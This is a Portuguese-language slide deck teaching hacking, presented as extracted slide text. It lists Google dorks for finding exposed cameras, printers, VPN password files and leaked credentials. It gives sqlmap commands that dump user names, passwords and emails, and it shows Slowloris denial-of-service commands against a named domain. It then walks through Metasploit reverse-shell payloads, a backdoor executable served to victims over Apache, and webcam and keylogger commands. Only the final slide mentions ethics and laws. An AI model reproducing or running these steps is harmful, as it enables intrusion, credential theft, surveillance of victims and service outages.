  • 24. Google Hacking • Invadindo impressora remota # intitle:”Web Image Monitor” & inurl:”/mainframe.cgi” • Buscando câmeras disponíveis na internet: # intitle:"Live View -AXIS 211" # inurl:"viewerframe?mode=motion“ # inurl:”/control/userimage.html” • Buscando por arquivos de VPN # !HOST=*.* intext:enc_UserPassword=* ext:pcf
  • 25. Google Hacking Mais dorks.. • inurl:"passes" OR inurl:"passwords" OR inurl:"credentials" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail • ext:sql intext:@gmail.com intext:password
  • 26. • Ataque que permite a injeção no query (banco de dados) retornando parâmetro não validados. Como informações de tabelas e colunas a qual podemos extrair informações privilegiadas sendo senhas de usuários, e-mails, cartões de créditos, entre outras informações delicadas.
  • 27. SQLi
  • 29. SQLi • Buscando falha de SQLi – Manualmente – Google Hacking – Scanners (Nessus, Vega, Acunetix..)
  • 30. SQLi (Sqlmap) Alvo: http://testphp.vulnweb.com/artists.php?artist=1 - Buscando o Banco de dados # sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs - Buscando as Tabelas # sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco --tables -Buscando as Colunas # slqmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco -T Nome_da_Tabela --columns -Extraindo os dados das Colunas #sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D Nome_do_Banco -T Nome_da_Tabela –C Nome_da_Colunas ‘nome,senha,email’ --dump
  • 31. DOS & DDOS • Ataques que viabilizam emitir diversas requisições por segundo para um alvo sobrecarregando, fazendo com que o serviço fique indisponível.
  • 32. Dos (Negação de Serviço)
  • 34. Slowloris (instalação e ataque) Baixe a ferramenta: # wget http://ha.ckers.org/slowloris/slowloris.pl Atribui a permissão para executa-lo. # chmod 777 slowloris.pl Inicie o Ataque: # slowloris.pl -dns www.cienciahacker.cf -port 80 -timeout 5 -num 5000 -dns = indica o alvo, podendo ser um IP ou SITE -port = Porta para o ataque. -timeout = Tempo de espera entre cada ataque -num = numero de pacotes.
  • 35. Exploits • Um exploit é um pedaço de software, um pedaço de dados ou uma sequência de comandos que tomam vantagem de um defeito, falha ou vulnerabilidade afim de causar um comportamento acidental ou imprevisto a ocorrer no software ou hardware de um computador ou em algum eletrônico (normalmente computadorizado). Tal comportamento frequentemente inclui coisas como ganhar o controle de um sistema de computador, permitindo elevação de privilégio ou um ataque de negação de serviço.
  • 36. Exploitando Windows XP • Abrimos a ferramenta msfconsole. # msfconsole • E selecionamos o exploit a seguir: # use windows/smb/ms08_067_netapi • Depois disso colocaremos o IP da vítima. # set RHOST 192.168.2.108 • Selecionamos o nosso payload a qual permite a interação entre nós e a vítima. # set PAYLOAD windows/meterpreter/reverse_tcp
  • 37. Exploitando Windows XP • E o nosso IP para receber a conexão. # set LHOST 192.168.2.103 • E o comando abaixo para executar o exploit já selecionado: # exploit Comandos Extras: • webcam_list, • webcam_snap, • shutdown -n • screenshot • keyscan_start • keyscan_dump • keyscan_stop • shutdown -s -t 1 • sysinfo
  • 38. Exploitando Windows 7 e 8 • Criamos o nosso payload com nosso ip e a porta 4444 para se comunicar com a vitima e damos um nome a ele: #msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 x>name.exe • Abrimos o msfconsole que é a nossa interface do nossos exploits a serem usados #msfconsole • Agora colocamos o nosso computador em modo listening a qual deixa esperando uma conexão com nosso payload criado. #use exploit/multi/handler • E agora informamos qual o nosso payload que iremos receber nessa chamada #set payload windows/meterpreter/reverse_tcp
  • 39. Exploitando Windows 7 e 8 • Depois disso colocamos o nosso IP para receber a conexão com a vitima. #set lhost IP • E o comando para executar nosso exploit. #exploit • Agora enviamos a vítima através do Apache #cp nome.exe /var/www #service apache2 start Agora só efetuar o download pelo IP do seu Apache e executar a backdoor.
  • 40.
  • 41. Visão no Mercado de Trabalho • Carência de profissionais éticos • Certificações • Leis Cibernéticas